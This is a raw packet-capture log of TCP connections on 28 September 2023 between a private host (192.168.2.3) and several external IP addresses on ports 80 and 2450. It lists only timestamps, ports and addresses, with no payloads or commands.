Sep 28, 2023 06:01:55.126576900 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.126604080 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126636982 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126647949 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.126678944 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231087923 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231174946 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231195927 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231219053 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231239080 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231259108 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231292963 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231343985 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231344938 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231367111 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231386900 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231395960 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231436014 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231439114 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231486082 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231525898 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231563091 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231584072 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231600046 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231611967 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231637001 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231650114 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231687069 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231707096 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231743097 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231764078 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231784105 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231812954 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231869936 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231892109 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231928110 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.231950045 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231976986 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.231996059 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232032061 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232053041 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232073069 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232100010 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232157946 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232199907 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232237101 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232254982 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232273102 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232284069 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232310057 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232323885 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232359886 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232378006 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232417107 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232438087 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232467890 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232485056 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232542038 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232553005 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232589960 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232610941 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232625961 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232639074 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232672930 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232693911 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232748985 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232760906 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232796907 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232817888 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232832909 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232845068 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232882977 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232901096 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.232953072 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.232969999 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233026028 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233067989 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233124971 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233136892 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233196020 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233203888 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233239889 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233259916 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233288050 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233366966 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233422041 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233438015 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233474016 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233494043 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233522892 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233542919 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233598948 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233611107 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233648062 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233664989 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233695030 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233715057 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233772039 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233786106 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233840942 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233854055 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233907938 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233923912 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.233979940 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.233992100 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234029055 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234049082 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234077930 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234127998 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234185934 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234198093 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234252930 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234297991 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234333992 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234354973 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234369993 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234381914 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234417915 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234488010 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234524965 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234544992 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234560966 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234575033 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234612942 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234628916 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234664917 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234683037 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234710932 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234733105 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234767914 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234787941 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234816074 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234836102 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234891891 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234905005 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234941006 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.234961033 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.234987974 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.235007048 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.235061884 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.235074997 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.235129118 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.235145092 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.235181093 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.235204935 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.235217094 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.235224009 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.235251904 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.235266924 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.235297918 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.325270891 CEST	49801	2450	192.168.2.3	81.19.131.36
Sep 28, 2023 06:01:55.452064991 CEST	49798	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:55.452508926 CEST	49802	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:55.485795021 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:01:55.486001015 CEST	49801	2450	192.168.2.3	81.19.131.36
Sep 28, 2023 06:01:55.486907959 CEST	49801	2450	192.168.2.3	81.19.131.36
Sep 28, 2023 06:01:55.639832020 CEST	80	49798	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:55.640017033 CEST	49798	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:55.642793894 CEST	80	49802	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:55.642891884 CEST	49802	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:55.643115044 CEST	49802	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:55.696873903 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:01:55.833013058 CEST	80	49802	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:55.834059000 CEST	80	49802	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:55.834224939 CEST	49802	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:55.862008095 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:55.862474918 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:55.898714066 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:01:55.900820017 CEST	49801	2450	192.168.2.3	81.19.131.36
Sep 28, 2023 06:01:56.042954922 CEST	80	49796	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.043015003 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.043205023 CEST	49796	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.043217897 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.043380022 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.061727047 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:01:56.106333017 CEST	49801	2450	192.168.2.3	81.19.131.36
Sep 28, 2023 06:01:56.224180937 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.226186991 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.226274967 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.226314068 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.226350069 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.226385117 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.226480007 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.226516962 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.226560116 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.226560116 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.226560116 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.226560116 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.226560116 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.226561069 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.226561069 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.226613045 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.226663113 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.226696014 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.226943970 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.227003098 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.227004051 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.251166105 CEST	49805	80	192.168.2.3	178.237.33.50
Sep 28, 2023 06:01:56.407191992 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407236099 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407273054 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407308102 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407341957 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407377005 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407402992 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407403946 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407403946 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407403946 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407403946 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407432079 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407470942 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407485962 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407486916 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407509089 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407521963 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407546997 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407568932 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407583952 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407599926 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407622099 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407658100 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407660007 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407695055 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407706976 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407706976 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407766104 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407785892 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407821894 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407851934 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407859087 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407875061 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407895088 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407922029 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407932997 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407941103 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.407968998 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.407982111 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.408030987 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.418092012 CEST	80	49805	178.237.33.50	192.168.2.3
Sep 28, 2023 06:01:56.418353081 CEST	49805	80	192.168.2.3	178.237.33.50
Sep 28, 2023 06:01:56.418518066 CEST	49805	80	192.168.2.3	178.237.33.50
Sep 28, 2023 06:01:56.588391066 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.588464022 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.588500977 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.588540077 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.588577032 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.588610888 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.588746071 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.588762999 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.588763952 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.588763952 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.588763952 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.588763952 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.588763952 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.588782072 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.588819981 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.588850975 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.588850975 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.588856936 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.588884115 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.588937998 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.588984966 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589021921 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589070082 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589070082 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589123964 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589200020 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589253902 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589289904 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589324951 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589345932 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589386940 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589457989 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589459896 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589529037 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589557886 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589593887 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589627981 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589648008 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589663982 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589700937 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589734077 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589736938 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589756966 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589773893 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589792013 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589811087 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589816093 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589848995 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589865923 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589884996 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589890957 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589920044 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589942932 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589956045 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.589968920 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.589991093 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.590007067 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590028048 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.590044975 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590063095 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.590074062 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590099096 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.590117931 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590135098 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.590150118 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590172052 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.590186119 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590209007 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.590231895 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590245008 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.590266943 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590282917 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.590289116 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590318918 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.590333939 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590356112 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.590368986 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590393066 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.590408087 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590444088 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.590451956 CEST	80	49805	178.237.33.50	192.168.2.3
Sep 28, 2023 06:01:56.590533972 CEST	49805	80	192.168.2.3	178.237.33.50
Sep 28, 2023 06:01:56.615817070 CEST	49801	2450	192.168.2.3	81.19.131.36
Sep 28, 2023 06:01:56.769488096 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769601107 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769623041 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769643068 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769668102 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769689083 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769726992 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769762993 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769798994 CEST	80	49804	157.90.36.211	192.168.2.3
